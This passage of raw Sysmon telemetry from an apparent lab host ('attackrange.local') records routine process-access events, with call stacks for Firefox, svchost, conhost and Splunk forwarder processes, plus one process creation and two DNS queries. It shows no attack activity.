Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.800{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 10341000x800000000000000017916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.800{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 10341000x800000000000000017915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.800{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000017914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.675{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-948C-6005-3F05-00000000A301}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.628{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.628{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.628{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.628{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.628{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-948C-6005-3F05-00000000A301}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.628{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-948C-6005-3F05-00000000A301}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.488{59A5CD1D-948C-6005-3F05-00000000A301}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x800000000000000017906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:42.382{59A5CD1D-8E56-6005-2E00-00000000A301}246439.100.215.91.in-addr.arpa.0type: 12 script4.ioam.de;C:\Windows\sysmon64.exe 22542200x800000000000000017905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.556{59A5CD1D-945A-6005-3305-00000000A301}7052d2p3zdq8vjvnxd.cloudfront.net02600:9000:21a1:c800:13:7ad6:7840:21;2600:9000:21a1:d000:13:7ad6:7840:21;2600:9000:21a1:dc00:13:7ad6:7840:21;2600:9000:21a1:1600:13:7ad6:7840:21;2600:9000:21a1:1e00:13:7ad6:7840:21;2600:9000:21a1:5e00:13:7ad6:7840:21;2600:9000:21a1:6a00:13:7ad6:7840:21;2600:9000:21a1:b400:13:7ad6:7840:21;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.868{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.865{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.864{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.852{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.772{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.759{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+1011628|C:\Program Files\Mozilla Firefox\xul.dll+1016ae2|C:\Program Files\Mozilla Firefox\xul.dll+2bc816d|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.706{59A5CD1D-945A-6005-3305-00000000A301}70526276C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+11c31bc|C:\Program Files\Mozilla Firefox\xul.dll+f7d0bf|C:\Program Files\Mozilla Firefox\xul.dll+f7420a|C:\Program Files\Mozilla Firefox\xul.dll+2259d90|C:\Program Files\Mozilla Firefox\xul.dll+226f63a|C:\Program Files\Mozilla Firefox\xul.dll+2252f19|C:\Program Files\Mozilla Firefox\xul.dll+2252c53|C:\Program Files\Mozilla Firefox\xul.dll+2256ba0|C:\Program Files\Mozilla Firefox\xul.dll+226bd4d|C:\Program Files\Mozilla Firefox\xul.dll+2275208|C:\Program Files\Mozilla Firefox\xul.dll+2274234|C:\Program Files\Mozilla Firefox\xul.dll+225db83|C:\Program Files\Mozilla Firefox\xul.dll+3af91|C:\Program Files\Mozilla Firefox\xul.dll+39cbd|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x800000000000000017965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.702{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.523{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-948D-6005-4005-00000000A301}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.522{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.521{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 